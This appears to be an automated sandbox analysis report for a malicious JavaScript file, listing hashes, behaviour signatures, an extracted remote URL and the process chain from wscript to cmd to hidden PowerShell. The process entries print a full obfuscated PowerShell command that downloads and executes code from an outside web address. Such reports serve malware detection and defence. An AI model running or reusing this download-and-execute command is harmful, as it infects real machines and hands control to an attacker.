Analysis
-
max time kernel
140s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
07/09/2022, 10:36
Static task
static1
Behavioral task
behavioral1
Sample
hq094345.js
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
hq094345.js
Resource
win10v2004-20220812-en
General
-
Target
hq094345.js
-
Size
286KB
-
MD5
5d04b0e90cb99355f3de9ee9d51727da
-
SHA1
b8ac2f1a8dcf1002dcd45f070bf42e4cb2e9d3d4
-
SHA256
6314ff0f179464c5af826c00e8f4e3a2686ef2ef026c229752c5d5db011d88d5
-
SHA512
774ddc68ff316ae2a15879a3610c30d9f637567bd946ba418ab85aca752c508079454e3b7cb09c1f0c7d4394a51b0925b0a29e236d24ddc7fe3f5b45f6847e37
-
SSDEEP
3072:qrjVJySRCL1ddImO3NwSa0wQwRCijyQL7oebGpTLW+B57wtR:qASkdIn9lpQL7oebGRLQR
Malware Config
Extracted
https://freedompublishingbooks.com.au/index/
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 18 4700 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4700 powershell.exe 4700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4700 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3700 wrote to memory of 1548 3700 wscript.exe 81 PID 3700 wrote to memory of 1548 3700 wscript.exe 81 PID 1548 wrote to memory of 4700 1548 cmd.exe 83 PID 1548 wrote to memory of 4700 1548 cmd.exe 83
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\hq094345.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pOwErShElL -NoP -w hIDdeN -eP BYPAsS -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBmAHIAZQBlAGQAbwBtAHAAdQBiAGwAaQBzAGgAaQBuAGcAYgBvAG8AawBzAC4AYwBvAG0ALgBhAHUALwBpAG4AZABlAHgALwAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwErShElL -NoP -w hIDdeN -eP BYPAsS -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBmAHIAZQBlAGQAbwBtAHAAdQBiAGwAaQBzAGgAaQBuAGcAYgBvAG8AawBzAC4AYwBvAG0ALgBhAHUALwBpAG4AZABlAHgALwAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
-